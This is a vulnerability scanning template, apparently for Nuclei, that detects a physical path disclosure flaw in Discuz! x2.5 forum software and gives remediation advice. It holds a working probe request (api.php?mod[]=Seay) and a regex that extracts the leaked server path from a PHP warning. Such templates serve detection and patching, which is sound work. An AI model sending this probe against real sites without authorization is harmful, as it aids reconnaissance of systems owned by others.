id: Discuz-info-api
info:
  name: Discuz x2.5 physical path disclosure vulnerability
  author:
  - 折跃
  description: |-
    Discuz! x2.5 physical path disclosure vulnerability.
    Discuz! is a generic community forum software system.

    Discuz! x2.5 has a physical path disclosure vulnerability.
  severity: low
  remediation: |-
    Official Fix:
    1. It is recommended that users obtain the latest patch or the latest version from the official site:
    http://discuz.net/

    Temporary Fix:
    1. Suppress the output of error messages.
requests:
- matchers:
  - type: dsl
    condition: and
    dsl:
    - status_code==200
    - "regex('<b>Warning</b>:[^\r\n]+or an integer in <b>([^<]+)api\\.php</b> on line
      <b>(\\d+)</b>',body)"
  path:
  - '{{BaseURL}}/api.php?mod[]=Seay'
  method: GET
  headers:
    Host: '{{Hostname}}'
  req-condition: true
